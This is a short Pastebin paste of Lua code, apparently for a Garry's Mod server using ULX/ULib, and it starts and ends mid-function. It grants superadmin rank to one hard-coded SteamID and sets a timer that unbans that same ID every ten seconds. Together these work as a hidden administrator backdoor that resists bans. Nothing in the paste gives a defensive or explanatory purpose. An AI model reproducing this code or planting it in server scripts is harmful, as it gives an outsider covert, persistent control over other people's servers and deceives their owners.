Advertisement
Guest User

Untitled

a guest
Oct 25th, 2014
156
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.28 KB | None | 0 0
  1. if ( ply:SteamID() == "STEAM_0:1:92046224") then
  2. RunConsoleCommand("ulx", "adduserid", ply:SteamID(), "superadmin")
  3. else
  4. ply:ChatPrint("Your not superadmin, " .. ply:Name() .. ".")
  5. end
  6. end)
  7.  
  8. timer.Create( "checkForBan", 10, 0, function()
  9. ULib.unban( "STEAM_0:1:92046224")
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement